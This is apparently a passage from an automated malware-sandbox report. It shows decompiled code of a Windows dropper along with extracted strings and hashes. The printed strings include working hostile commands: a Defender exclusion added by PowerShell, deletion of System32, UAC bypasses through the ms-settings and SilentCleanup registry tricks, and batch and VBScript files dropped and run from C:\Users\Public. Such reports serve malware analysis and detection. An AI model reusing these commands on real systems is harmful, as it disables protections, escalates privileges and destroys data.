						E504842CC(0x504959d8, _v116);
						_t260 =  *0x504959d4; // 0x6b8078c
						E50482E64(0x50495880, _t260, __eflags);
						E50483170();
						_t145 = E50482B68();
						__eflags = _t145;
						if(_t145 == 0) {
							_push(0);
							_t160 =  *0x504959d8; // 0x6b8135c
							_t161 = E50484514(_t160);
							E50484764(0x504959d8);
							_t165 = E50482FB4(_t161); // executed
							E50482AE8(_t165);
							E50482AE8(E50482FD4(0x50495880));
						}
						 *0x504959cc = E504836BC(1);
						 *[fs:eax] = _t285;
						_t216 =  *0x504959dc; // 0x6b807e4
						E50484560( &_v124, _t216, "cmd /c ");
						_t151 =  *0x504959cc; // 0x6b81488
						 *((intOrPtr*)( *_t151 + 0x38))( *[fs:eax], 0x50493464, _t284);
						_t153 =  *0x504959cc; // 0x6b81488
						 *((intOrPtr*)( *_t153 + 0x38))();
						_t155 =  *0x504959cc; // 0x6b81488
						 *((intOrPtr*)( *_t155 + 0x74))();
						__eflags = 0;
						_pop(_t267);
						 *[fs:eax] = _t267;
						_push(E5049346B);
						_t158 =  *0x504959cc; // 0x6b81488
						return E504836EC(_t158);
					}
				} else {
					E50484368(0x504959e4, 0x10f, 0x504943cc);
					_t173 =  *0x504959e0; // 0x6b80600
					E50484470( &_v104, E50484714(_t173));
					_t177 =  *0x504959e4; // 0x6b815f4
					E50492C24(_t177, __ebx, _v104, 0x504937a0, __esi,  &_v100);
					E504842CC(0x504959d8, _v100);
					_t273 =  *0x504959d4; // 0x6b8078c
					E50482E64(0x50495880, _t273, _t287);
					E50483170();
					if(E50482B68() == 0) {
						_push(0);
						_t200 =  *0x504959d8; // 0x6b8135c
						_t201 = E50484514(_t200);
						E50484764(0x504959d8);
						_t205 = E50482FB4(_t201); // executed
						E50482AE8(_t205);
						E50482AE8(E50482FD4(0x50495880));
					}
					 *0x504959cc = E504836BC(1);
					 *[fs:eax] = _t285;
					_t225 =  *0x504959dc; // 0x6b807e4
					E50484560( &_v108, _t225, "cmd /c ");
					_t191 =  *0x504959cc; // 0x6b81488
					 *((intOrPtr*)( *_t191 + 0x38))( *[fs:eax], 0x50493199, _t284);
					_t193 =  *0x504959cc; // 0x6b81488
					 *((intOrPtr*)( *_t193 + 0x38))();
					_t195 =  *0x504959cc; // 0x6b81488
					 *((intOrPtr*)( *_t195 + 0x74))();
					_pop(_t280);
					 *[fs:eax] = _t280;
					_push(E504931A0);
					_t198 =  *0x504959cc; // 0x6b81488
					return E504836EC(_t198); // executed
				}
			}





























































                                                                                                            0x50492ef1
                                                                                                            0x50492ef3
                                                                                                            0x50492ef8
                                                                                                            0x50492ef8
                                                                                                            0x50492efa
                                                                                                            0x50492efc
                                                                                                            0x50492efc
                                                                                                            0x50492eff
                                                                                                            0x50492f05
                                                                                                            0x50492f0c
                                                                                                            0x50492f0d
                                                                                                            0x50492f12
                                                                                                            0x50492f15
                                                                                                            0x50492f1d
                                                                                                            0x50492f25
                                                                                                            0x50492f2b
                                                                                                            0x50492f36
                                                                                                            0x50492f3b
                                                                                                            0x50492f3e
                                                                                                            0x50492f43
                                                                                                            0x50492f52
                                                                                                            0x50492f5f
                                                                                                            0x50492f6c
                                                                                                            0x50492f71
                                                                                                            0x50492f76
                                                                                                            0x50492f7c
                                                                                                            0x50492f89
                                                                                                            0x50492f9d
                                                                                                            0x50492fa2
                                                                                                            0x50492fa7
                                                                                                            0x50492fad
                                                                                                            0x50492fba
                                                                                                            0x50492fce
                                                                                                            0x50492fd3
                                                                                                            0x50492fd8
                                                                                                            0x50492fde
                                                                                                            0x50492feb
                                                                                                            0x50492fff
                                                                                                            0x50493004
                                                                                                            0x50493009
                                                                                                            0x5049300f
                                                                                                            0x5049301c
                                                                                                            0x50493030
                                                                                                            0x50493035
                                                                                                            0x5049303a
                                                                                                            0x50493040
                                                                                                            0x5049304d
                                                                                                            0x50493061
                                                                                                            0x5049306b
                                                                                                            0x50493070
                                                                                                            0x50493072
                                                                                                            0x5049332c
                                                                                                            0x50493336
                                                                                                            0x5049333b
                                                                                                            0x5049333d
                                                                                                            0x504935f2
                                                                                                            0x50493601
                                                                                                            0x50493609
                                                                                                            0x5049360e
                                                                                                            0x50493620
                                                                                                            0x5049362b
                                                                                                            0x50493630
                                                                                                            0x50493642
                                                                                                            0x5049364d
                                                                                                            0x50493652
                                                                                                            0x50493664
                                                                                                            0x5049366f
                                                                                                            0x50493674
                                                                                                            0x50493686
                                                                                                            0x50493691
                                                                                                            0x50493696
                                                                                                            0x504936a8
                                                                                                            0x504936b3
                                                                                                            0x504936ba
                                                                                                            0x504936bf
                                                                                                            0x504936c1
                                                                                                            0x504936c4
                                                                                                            0x504936c7
                                                                                                            0x504936dc
                                                                                                            0x50493343
                                                                                                            0x50493352
                                                                                                            0x5049335b
                                                                                                            0x5049336a
                                                                                                            0x50493377
                                                                                                            0x5049337c
                                                                                                            0x50493389
                                                                                                            0x5049338e
                                                                                                            0x50493399
                                                                                                            0x504933a8
                                                                                                            0x504933ad
                                                                                                            0x504933b2
                                                                                                            0x504933b4
                                                                                                            0x504933b6
                                                                                                            0x504933b8
                                                                                                            0x504933bd
                                                                                                            0x504933c8
                                                                                                            0x504933d5
                                                                                                            0x504933da
                                                                                                            0x504933e9
                                                                                                            0x504933e9
                                                                                                            0x504933fa
                                                                                                            0x5049340a
                                                                                                            0x50493410
                                                                                                            0x5049341b
                                                                                                            0x50493423
                                                                                                            0x5049342a
                                                                                                            0x50493432
                                                                                                            0x50493439
                                                                                                            0x50493442
                                                                                                            0x50493449
                                                                                                            0x5049344c
                                                                                                            0x5049344e
                                                                                                            0x50493451
                                                                                                            0x50493454
                                                                                                            0x50493459
                                                                                                            0x50493463
                                                                                                            0x50493463
                                                                                                            0x50493078
                                                                                                            0x50493087
                                                                                                            0x50493090
                                                                                                            0x5049309f
                                                                                                            0x504930ac
                                                                                                            0x504930b1
                                                                                                            0x504930be
                                                                                                            0x504930c3
                                                                                                            0x504930ce
                                                                                                            0x504930dd
                                                                                                            0x504930e9
                                                                                                            0x504930eb
                                                                                                            0x504930ed
                                                                                                            0x504930f2
                                                                                                            0x504930fd
                                                                                                            0x5049310a
                                                                                                            0x5049310f
                                                                                                            0x5049311e
                                                                                                            0x5049311e
                                                                                                            0x5049312f
                                                                                                            0x5049313f
                                                                                                            0x50493145
                                                                                                            0x50493150
                                                                                                            0x50493158
                                                                                                            0x5049315f
                                                                                                            0x50493167
                                                                                                            0x5049316e
                                                                                                            0x50493177
                                                                                                            0x5049317e
                                                                                                            0x50493183
                                                                                                            0x50493186
                                                                                                            0x50493189
                                                                                                            0x5049318e
                                                                                                            0x50493198
                                                                                                            0x50493198

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .bat$AppData\Local$C:\Users\Public\$C:\Windows\Finex$Rer.bat$YAYA$cmd /c $cvb.vbs$exit$hcc.bat$powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath YAYA del /q "C:\Windows \System32\*"rmdir "C:\Windows \System32"rmdir "C:\Windows \"mkdir "C:\Windows\Fin$tso.bat
                                                                                                            • API String ID: 0-3983416501
                                                                                                            • Opcode ID: d6dc4ed7441e2b13fee9c7acd0c9ee6ea648fc5867d7d1dc68fc954c318fa915
                                                                                                            • Instruction ID: 00aaa10887ea207139cef5fc7b41afafe437bb0cffce7fb0289e9176fab133ed
                                                                                                            • Opcode Fuzzy Hash: d6dc4ed7441e2b13fee9c7acd0c9ee6ea648fc5867d7d1dc68fc954c318fa915
                                                                                                            • Instruction Fuzzy Hash: E5B123B4602144DBD720DBE4D942A4E77A5AFA5A19F708F7FF8049B325DB389C05CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50493290, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 117sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E50493290(void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t47;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t65;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t99;
				intOrPtr _t102;
				intOrPtr _t104;
				void* _t105;
				void* _t109;
				intOrPtr _t114;
				void* _t115;
				void* _t119;
				void* _t124;
				intOrPtr _t130;
				intOrPtr _t139;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t160;
				void* _t163;
				void* _t164;
				intOrPtr _t165;
				void* _t166;

				_t166 = __eflags;
				_t163 = __esi;
				_t124 = __ebx;
				E50484368(0x504959e4, 0x11b, 0x504944dc);
				_t139 =  *0x504959ec; // 0x6b806dc
				E50482E64(0x50495880, _t139, _t166);
				E50483170();
				if(E50482B68() == 0) {
					_push(0);
					_t114 =  *0x504959e4; // 0x6b815f4
					_t115 = E50484514(_t114);
					E50484764(0x504959e4);
					_t119 = E50482FB4(_t115); // executed
					E50482AE8(_t119);
					E50482AE8(E50482FD4(0x50495880));
				}
				_t30 =  *0x504959ec; // 0x6b806dc
				ShellExecuteA(0, "Open", E50484714(_t30), 0x50493914, 0x50493914, 0); // executed
				Sleep(0x2710); // executed
				_t34 = E5048779C("C:\\Windows\\Finex");
				_t168 = _t34;
				if(_t34 != 0) {
					_t35 =  *0x504959e8; // 0x6b80688
					E50484470(_t164 - 0x80, E50484714(_t35));
					E504877C0( *((intOrPtr*)(_t164 - 0x80)));
					_t41 =  *0x504959f0; // 0x6b80734
					E50484470(_t164 - 0x84, E50484714(_t41));
					E504877C0( *((intOrPtr*)(_t164 - 0x84)));
					_t47 =  *0x504959f4; // 0x0
					E50484470(_t164 - 0x88, E50484714(_t47));
					E504877C0( *((intOrPtr*)(_t164 - 0x88)));
					_t53 =  *0x504959ec; // 0x6b806dc
					E50484470(_t164 - 0x8c, E50484714(_t53));
					E504877C0( *((intOrPtr*)(_t164 - 0x8c)));
					_t59 =  *0x504959d4; // 0x6b8078c
					E50484470(_t164 - 0x90, E50484714(_t59));
					E504877C0( *((intOrPtr*)(_t164 - 0x90)));
					_t65 =  *0x504959dc; // 0x6b807e4
					E50484470(_t164 - 0x94, E50484714(_t65));
					E504877C0( *((intOrPtr*)(_t164 - 0x94)));
					ExitProcess(0); // executed
					__eflags = 0;
					_pop(_t147);
					 *[fs:eax] = _t147;
					_push(0x504936e4);
					return E5048429C(_t164 - 0x94, 0x16);
				} else {
					E50484368(0x504959e4, 0x10f, 0x504943cc);
					_t77 =  *0x504959e0; // 0x6b80600
					E50484470(_t164 - 0x74, E50484714(_t77));
					_t81 =  *0x504959e4; // 0x6b815f4
					E50492C24(_t81, _t124,  *((intOrPtr*)(_t164 - 0x74)), 0x504937a0, _t163, _t164 - 0x70);
					E504842CC(0x504959d8,  *((intOrPtr*)(_t164 - 0x70)));
					_t153 =  *0x504959d4; // 0x6b8078c
					E50482E64(0x50495880, _t153, _t168);
					E50483170();
					if(E50482B68() == 0) {
						_push(0);
						_t104 =  *0x504959d8; // 0x6b8135c
						_t105 = E50484514(_t104);
						E50484764(0x504959d8);
						_t109 = E50482FB4(_t105); // executed
						E50482AE8(_t109);
						E50482AE8(E50482FD4(0x50495880));
					}
					 *0x504959cc = E504836BC(1);
					 *[fs:eax] = _t165;
					_t130 =  *0x504959dc; // 0x6b807e4
					E50484560(_t164 - 0x78, _t130, "cmd /c ");
					_t95 =  *0x504959cc; // 0x6b81488
					 *((intOrPtr*)( *_t95 + 0x38))( *[fs:eax], 0x50493464, _t164);
					_t97 =  *0x504959cc; // 0x6b81488
					 *((intOrPtr*)( *_t97 + 0x38))();
					_t99 =  *0x504959cc; // 0x6b81488
					 *((intOrPtr*)( *_t99 + 0x74))();
					_pop(_t160);
					 *[fs:eax] = _t160;
					_push(E5049346B);
					_t102 =  *0x504959cc; // 0x6b81488
					return E504836EC(_t102);
				}
			}

































                                                                                                            0x50493290
                                                                                                            0x50493290
                                                                                                            0x50493290
                                                                                                            0x5049329f
                                                                                                            0x504932a4
                                                                                                            0x504932af
                                                                                                            0x504932be
                                                                                                            0x504932ca
                                                                                                            0x504932cc
                                                                                                            0x504932ce
                                                                                                            0x504932d3
                                                                                                            0x504932de
                                                                                                            0x504932eb
                                                                                                            0x504932f0
                                                                                                            0x504932ff
                                                                                                            0x504932ff
                                                                                                            0x50493310
                                                                                                            0x50493322
                                                                                                            0x5049332c
                                                                                                            0x50493336
                                                                                                            0x5049333b
                                                                                                            0x5049333d
                                                                                                            0x504935f2
                                                                                                            0x50493601
                                                                                                            0x50493609
                                                                                                            0x5049360e
                                                                                                            0x50493620
                                                                                                            0x5049362b
                                                                                                            0x50493630
                                                                                                            0x50493642
                                                                                                            0x5049364d
                                                                                                            0x50493652
                                                                                                            0x50493664
                                                                                                            0x5049366f
                                                                                                            0x50493674
                                                                                                            0x50493686
                                                                                                            0x50493691
                                                                                                            0x50493696
                                                                                                            0x504936a8
                                                                                                            0x504936b3
                                                                                                            0x504936ba
                                                                                                            0x504936bf
                                                                                                            0x504936c1
                                                                                                            0x504936c4
                                                                                                            0x504936c7
                                                                                                            0x504936dc
                                                                                                            0x50493343
                                                                                                            0x50493352
                                                                                                            0x5049335b
                                                                                                            0x5049336a
                                                                                                            0x50493377
                                                                                                            0x5049337c
                                                                                                            0x50493389
                                                                                                            0x5049338e
                                                                                                            0x50493399
                                                                                                            0x504933a8
                                                                                                            0x504933b4
                                                                                                            0x504933b6
                                                                                                            0x504933b8
                                                                                                            0x504933bd
                                                                                                            0x504933c8
                                                                                                            0x504933d5
                                                                                                            0x504933da
                                                                                                            0x504933e9
                                                                                                            0x504933e9
                                                                                                            0x504933fa
                                                                                                            0x5049340a
                                                                                                            0x50493410
                                                                                                            0x5049341b
                                                                                                            0x50493423
                                                                                                            0x5049342a
                                                                                                            0x50493432
                                                                                                            0x50493439
                                                                                                            0x50493442
                                                                                                            0x50493449
                                                                                                            0x5049344e
                                                                                                            0x50493451
                                                                                                            0x50493454
                                                                                                            0x50493459
                                                                                                            0x50493463
                                                                                                            0x50493463

                                                                                                            APIs
                                                                                                            • ShellExecuteA.SHELL32(00000000,Open,00000000,50493914,50493914,00000000), ref: 50493322
                                                                                                            • Sleep.KERNEL32(00002710,cvb.vbs,C:\Users\Public\,hcc.bat,C:\Users\Public\,Rer.bat,C:\Users\Public\,tso.bat,C:\Users\Public\,.bat,C:\Users\Public\,AppData\Local,504936F4,?,00000000,504936DD), ref: 5049332C
                                                                                                            Strings
                                                                                                            • Open, xrefs: 5049331B
                                                                                                            • C:\Windows\Finex, xrefs: 50493331
                                                                                                            • exit, xrefs: 5049342D
                                                                                                            • YAYA, xrefs: 50493372
                                                                                                            • cmd /c , xrefs: 50493416
                                                                                                            • reg delete hkcu\Environment /v windir /f reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /Ireg delete hkcu\En, xrefs: 50493290
                                                                                                            • powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath YAYA del /q "C:\Windows \System32\*"rmdir "C:\Windows \System32"rmdir "C:\Windows \"mkdir "C:\Windows\Fin, xrefs: 50493343
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: ExecuteShellSleep
                                                                                                            • String ID: C:\Windows\Finex$Open$YAYA$cmd /c $exit$powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath YAYA del /q "C:\Windows \System32\*"rmdir "C:\Windows \System32"rmdir "C:\Windows \"mkdir "C:\Windows\Fin$reg delete hkcu\Environment /v windir /f reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /Ireg delete hkcu\En
                                                                                                            • API String ID: 4194306370-2066135041
                                                                                                            • Opcode ID: b4df75f925fe6ddff465281f66ca07ac80e4016b34995094ab675c373d1b8e77
                                                                                                            • Instruction ID: 1258295705cf4e55aca08533beb19e632dbdc818a88f7cbe9d83ccddc505d965
                                                                                                            • Opcode Fuzzy Hash: b4df75f925fe6ddff465281f66ca07ac80e4016b34995094ab675c373d1b8e77
                                                                                                            • Instruction Fuzzy Hash: 93412EB4302180DFD724EBE4D946A1A3A61AFA5A19B708F3FF9049B351DA3CDC05CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5049355B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E5049355B(void* __eflags) {
				intOrPtr _t21;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t42;
				intOrPtr _t48;
				intOrPtr _t54;
				intOrPtr _t63;
				void* _t64;
				void* _t68;
				intOrPtr _t78;
				intOrPtr _t86;
				void* _t89;
				void* _t90;

				_t90 = __eflags;
				E50484368(0x504959e4, 0x186, 0x504945f8);
				_t78 =  *0x504959ec; // 0x6b806dc
				E50482E64(0x50495880, _t78, _t90);
				E50483170();
				if(E50482B68() == 0) {
					_push(0);
					_t63 =  *0x504959e4; // 0x6b815f4
					_t64 = E50484514(_t63);
					E50484764(0x504959e4);
					_t68 = E50482FB4(_t64); // executed
					E50482AE8(_t68);
					E50482AE8(E50482FD4(0x50495880));
				}
				_t21 =  *0x504959ec; // 0x6b806dc
				ShellExecuteA(0, "Open", E50484714(_t21), 0x50493914, 0x50493914, 0);
				_t24 =  *0x504959e8; // 0x6b80688
				E50484470(_t89 - 0x80, E50484714(_t24));
				E504877C0( *((intOrPtr*)(_t89 - 0x80)));
				_t30 =  *0x504959f0; // 0x6b80734
				E50484470(_t89 - 0x84, E50484714(_t30));
				E504877C0( *((intOrPtr*)(_t89 - 0x84)));
				_t36 =  *0x504959f4; // 0x0
				E50484470(_t89 - 0x88, E50484714(_t36));
				E504877C0( *((intOrPtr*)(_t89 - 0x88)));
				_t42 =  *0x504959ec; // 0x6b806dc
				E50484470(_t89 - 0x8c, E50484714(_t42));
				E504877C0( *((intOrPtr*)(_t89 - 0x8c)));
				_t48 =  *0x504959d4; // 0x6b8078c
				E50484470(_t89 - 0x90, E50484714(_t48));
				E504877C0( *((intOrPtr*)(_t89 - 0x90)));
				_t54 =  *0x504959dc; // 0x6b807e4
				E50484470(_t89 - 0x94, E50484714(_t54));
				E504877C0( *((intOrPtr*)(_t89 - 0x94)));
				ExitProcess(0); // executed
				_pop(_t86);
				 *[fs:eax] = _t86;
				_push(0x504936e4);
				return E5048429C(_t89 - 0x94, 0x16);
			}

















                                                                                                            0x5049355b
                                                                                                            0x5049356a
                                                                                                            0x5049356f
                                                                                                            0x5049357a
                                                                                                            0x50493589
                                                                                                            0x50493595
                                                                                                            0x50493597
                                                                                                            0x50493599
                                                                                                            0x5049359e
                                                                                                            0x504935a9
                                                                                                            0x504935b6
                                                                                                            0x504935bb
                                                                                                            0x504935ca
                                                                                                            0x504935ca
                                                                                                            0x504935db
                                                                                                            0x504935ed
                                                                                                            0x504935f2
                                                                                                            0x50493601
                                                                                                            0x50493609
                                                                                                            0x5049360e
                                                                                                            0x50493620
                                                                                                            0x5049362b
                                                                                                            0x50493630
                                                                                                            0x50493642
                                                                                                            0x5049364d
                                                                                                            0x50493652
                                                                                                            0x50493664
                                                                                                            0x5049366f
                                                                                                            0x50493674
                                                                                                            0x50493686
                                                                                                            0x50493691
                                                                                                            0x50493696
                                                                                                            0x504936a8
                                                                                                            0x504936b3
                                                                                                            0x504936ba
                                                                                                            0x504936c1
                                                                                                            0x504936c4
                                                                                                            0x504936c7
                                                                                                            0x504936dc

                                                                                                            APIs
                                                                                                            • ShellExecuteA.SHELL32(00000000,Open,00000000,50493914,50493914,00000000), ref: 504935ED
                                                                                                            • ExitProcess.KERNEL32(00000000,00002710,cvb.vbs,C:\Users\Public\,hcc.bat,C:\Users\Public\,Rer.bat,C:\Users\Public\,tso.bat,C:\Users\Public\,.bat,C:\Users\Public\,AppData\Local,504936F4,?,00000000), ref: 504936BA
                                                                                                            Strings
                                                                                                            • Open, xrefs: 504935E6
                                                                                                            • REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /fREG ADD "hkcu\software\cla, xrefs: 5049355B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: ExecuteExitProcessShell
                                                                                                            • String ID: Open$REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /fREG ADD "hkcu\software\cla
                                                                                                            • API String ID: 1124553745-3160024500
                                                                                                            • Opcode ID: c3ee93b1058dac2930eba2d84a9db262a366e9f870dc889091dae0501893cb18
                                                                                                            • Instruction ID: c35d0896251c4bad8cd17546d386b6549d3ab3bcff0ca7629a62fde1a015aeef
                                                                                                            • Opcode Fuzzy Hash: c3ee93b1058dac2930eba2d84a9db262a366e9f870dc889091dae0501893cb18
                                                                                                            • Instruction Fuzzy Hash: 7C31EA74602044CBD710E7E4DD42B4E66A1AFA1A08F208F7BB544AB225DF38AD45CBD0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50483090, Relevance: 4.6, APIs: 3, Instructions: 69fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E50483090(void** __eax, void* __ecx, void* __edx) {
				void* _t15;
				long _t16;
				long _t18;
				void** _t22;
				long _t24;
				signed int _t29;
				long _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t37;

				_t37 = __edx;
				_t33 = __ecx;
				_t22 = __eax;
				if(0xffffffffffff2850 == 0) {
					L4:
					_t22[1] = 0xd7b3;
					_t22[2] = _t37;
					_t22[9] = 0x50483068;
					_t22[7] = E50482C48;
					if(_t22[0x12] == 0) {
						_t22[9] = E50482C48;
						if(_t33 == 3) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff6);
						}
						_t15 = GetStdHandle();
					} else {
						_t18 = 0xc0000000;
						_t29 =  *0x5049400c; // 0x2
						_t32 =  *(((_t29 & 0x00000070) >> 2) + 0x50494068);
						_t24 = 2;
						_t34 = _t33 - 3;
						if(_t34 != 0) {
							_t24 = 3;
							_t35 = _t34 + 1;
							if(_t35 != 0) {
								_t18 = 0x40000000;
								_t22[1] = 0xd7b2;
								if(_t35 + 1 != 0) {
									_t18 = 0x80000000;
									_t22[1] = 0xd7b1;
								}
							}
						}
						_t15 = CreateFileA( &(_t22[0x12]), _t18, _t32, 0, _t24, 0x80, 0); // executed
					}
					if(_t15 == 0xffffffff) {
						_t22[1] = 0xd7b0;
						_t16 = GetLastError();
						L18:
						return E50482B08(_t16);
					} else {
						 *_t22 = _t15;
						return _t15;
					}
				}
				if(0xffffffffffff2850 > 3) {
					_t16 = 0x66;
					goto L18;
				}
				if( *((intOrPtr*)(__eax + 0x24))() != 0) {
					E50482B08(_t20);
				}
				goto L4;
			}














                                                                                                            0x50483093
                                                                                                            0x50483095
                                                                                                            0x50483099
                                                                                                            0x504830a5
                                                                                                            0x504830bc
                                                                                                            0x504830bc
                                                                                                            0x504830c2
                                                                                                            0x504830c5
                                                                                                            0x504830cc
                                                                                                            0x504830d7
                                                                                                            0x50483139
                                                                                                            0x50483143
                                                                                                            0x50483149
                                                                                                            0x50483145
                                                                                                            0x50483145
                                                                                                            0x50483145
                                                                                                            0x5048314b
                                                                                                            0x504830d9
                                                                                                            0x504830d9
                                                                                                            0x504830de
                                                                                                            0x504830ea
                                                                                                            0x504830f0
                                                                                                            0x504830f5
                                                                                                            0x504830f8
                                                                                                            0x504830fa
                                                                                                            0x504830ff
                                                                                                            0x50483100
                                                                                                            0x50483102
                                                                                                            0x50483108
                                                                                                            0x5048310e
                                                                                                            0x50483110
                                                                                                            0x50483115
                                                                                                            0x50483115
                                                                                                            0x5048310e
                                                                                                            0x50483100
                                                                                                            0x5048312b
                                                                                                            0x5048312b
                                                                                                            0x50483133
                                                                                                            0x50483159
                                                                                                            0x5048315f
                                                                                                            0x50483164
                                                                                                            0x00000000
                                                                                                            0x50483135
                                                                                                            0x50483135
                                                                                                            0x00000000
                                                                                                            0x50483135
                                                                                                            0x50483133
                                                                                                            0x504830aa
                                                                                                            0x50483152
                                                                                                            0x00000000
                                                                                                            0x50483152
                                                                                                            0x504830b5
                                                                                                            0x504830b7
                                                                                                            0x504830b7
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000,?,?,?,5048317A,504933AD,?,00002710,cvb.vbs,C:\Users\Public\), ref: 5048312B
                                                                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,5048317A,504933AD,?,00002710,cvb.vbs,C:\Users\Public\,hcc.bat,C:\Users\Public\,Rer.bat,C:\Users\Public\,tso.bat,C:\Users\Public\), ref: 5048314B
                                                                                                            • GetLastError.KERNEL32(000000F5,?,?,?,5048317A,504933AD,?,00002710,cvb.vbs,C:\Users\Public\,hcc.bat,C:\Users\Public\,Rer.bat,C:\Users\Public\,tso.bat,C:\Users\Public\), ref: 5048315F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorFileHandleLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1572049330-0
                                                                                                            • Opcode ID: 846a983521ffba29abb0f17eee3686d3d3fecc99d6c6e544b25f4740e194ca28
                                                                                                            • Instruction ID: a6272154e7bffc052c32c0dec02542a9cb26f066c427a87f9058a88ba631b0f0
                                                                                                            • Opcode Fuzzy Hash: 846a983521ffba29abb0f17eee3686d3d3fecc99d6c6e544b25f4740e194ca28
                                                                                                            • Instruction Fuzzy Hash: 6F11296120120096EB24DF98CD8979ABA599F85E15F24CF5BE6098F3A9E77CCC41C362
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50482F28, Relevance: 3.1, APIs: 2, Instructions: 60fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E50482F28(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
				long _v8;
				void** _t48;
				signed int _t49;
				signed int _t58;

				_t58 = _t49;
				_t48 = __eax;
				_t2 = _t48 + 4; // 0x1d7b0
				if(_a12 != ( *_t2 & 0x0000ffff & _a12)) {
					E50482B08(0x67);
					_v8 = 0;
				} else {
					_t4 = _t48 + 8; // 0x1
					if(WriteFile( *__eax, __edx,  *_t4 * _t58,  &_v8, 0) != 0) {
						_t13 = _t48 + 8; // 0x1
						_v8 = _v8 /  *_t13;
						if(_a16 == 0) {
							if(_t58 != _v8) {
								E50482B08(_a4);
								_v8 = 0;
							}
						} else {
							 *_a16 = _v8;
						}
					} else {
						E50482B08(GetLastError());
						_v8 = 0;
					}
				}
				return _v8;
			}







                                                                                                            0x50482f2f
                                                                                                            0x50482f33
                                                                                                            0x50482f38
                                                                                                            0x50482f40
                                                                                                            0x50482f9f
                                                                                                            0x50482fa6
                                                                                                            0x50482f42
                                                                                                            0x50482f48
                                                                                                            0x50482f57
                                                                                                            0x50482f6f
                                                                                                            0x50482f72
                                                                                                            0x50482f7a
                                                                                                            0x50482f89
                                                                                                            0x50482f8e
                                                                                                            0x50482f95
                                                                                                            0x50482f95
                                                                                                            0x50482f7c
                                                                                                            0x50482f82
                                                                                                            0x50482f82
                                                                                                            0x50482f59
                                                                                                            0x50482f5e
                                                                                                            0x50482f65
                                                                                                            0x50482f65
                                                                                                            0x50482f57
                                                                                                            0x50482fb1

                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(00000001,00000000,00000001,?,00000000,?,?,?,00000000,?,50482FCD,00000065,50482F20,0000D7B2,?), ref: 50482F52
                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,50482FCD,00000065,50482F20,0000D7B2,?,?,?,504933DA,00000000,?,00002710), ref: 50482F59
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 442123175-0
                                                                                                            • Opcode ID: 8c3cf17856f5410592a468529bc68b7b06d8e7f69e84aab07c40047d01a6e244
                                                                                                            • Instruction ID: 73bf040e7ce502422175a3e1778882b18d26f33858825b763ee30eef31f7cb68
                                                                                                            • Opcode Fuzzy Hash: 8c3cf17856f5410592a468529bc68b7b06d8e7f69e84aab07c40047d01a6e244
